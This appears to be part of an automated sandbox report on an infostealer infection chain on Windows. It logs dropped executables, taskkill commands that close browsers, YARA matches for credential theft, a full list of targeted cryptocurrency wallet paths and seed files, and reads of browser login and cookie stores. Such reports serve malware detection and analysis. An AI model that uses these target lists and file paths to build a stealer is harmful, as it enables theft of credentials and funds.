                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CBA4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6CBA4760
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmp | Binary or memory string: Program Manager
                          Source: rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmp | Binary or memory string: 4Program Manager
                          Source: file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: M_Program Manager
                          Source: firefox.exe, 0000002F.00000002.3427532099.000000E10ABFB000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ?ProgmanListenerWi
                          Source: EBFBFBFIIJ.exe, EBFBFBFIIJ.exe, 00000015.00000002.2786845874.0000000001106000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000016.00000002.3427201443.0000000000AB6000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000022.00000002.3357465758.0000000000AB6000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: R1Program Manager
                          Source: file.exe | Binary or memory string: RM_Program Manager
                          Source: fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmp | Binary or memory string: +-WProgram Manager
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9AB341 cpuid 0_2_6C9AB341
                          Source: C:\Users\user\Desktop\file.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\file.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9735A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C9735A0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008865E0 LookupAccountNameA,22_2_008865E0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C2517 GetTimeZoneInformation,22_2_008C2517
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA8390 NSS_GetVersion,0_2_6CAA8390
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: fc1511c233.exe, 0000001B.00000003.3393452315.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 34.2.skotes.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.skotes.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.EBFBFBFIIJ.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.3419500975.0000000000881000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2785476787.0000000000ED1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.3351261822.0000000000881000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1b3b76c439.exe PID: 7712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 26.2.e6d73861f4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.e6d73861f4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.e6d73861f4.exe.4b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.3.e6d73861f4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.3209738665.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.3419472143.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Electrum
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2729388458.0000000001550000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: ElectrumLTC
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2727922118.0000000000B70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Ethereum\
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 185.215.113.16gineer\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: keystore
Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*-
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
